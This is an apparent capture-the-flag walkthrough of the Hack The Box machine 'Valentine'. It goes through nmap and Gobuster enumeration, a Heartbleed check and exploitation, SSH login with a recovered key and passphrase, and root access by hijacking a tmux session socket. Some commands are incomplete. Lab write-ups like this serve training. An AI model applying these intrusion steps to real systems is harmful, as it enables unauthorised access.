Machine Creator: mrb3n
Let’s start with a quick NMAP scan to discover open ports
nmap -sS –min-rate 5000 –max-retries 1 -p- 10.10.10.79
Web Directory Enumeration
Let’s use Gobuster to search for directories.
If we browse the directories from the Gobuster scan, we can see a couple of files in the dev directory.
Since we do have an SSL certificate, let’s see if there are any security vulnerabilities. We can use Nmap SSL scripts to check for any exploits. We can search for SSL scripts in the Nmap scripts directory using ls and filtering using grep.
/usr/share/nmap/scripts/ | grep “ssl”
nmap –script=ssl-heartbleed -p 443 10.10.10.79
If we look back at the image in the website, this can hint to the vulnerability.
There is a Metasploit module for heartbleed but let’s do this exploit manually. We can download a python script from GitHub that will exploit heartbleed.1
Piecing everything together now lets ssh into Valentine. Using the file RSA private key “hype_key,” the passphrase “heartbleedbelievethehype,” and user hype (as in hype_key) we now have user access to Valentine.
We can read user.txt as user hype.
tmux -S /.devs/dev_sess
Connecting to the root tmux session we now have a root terminal.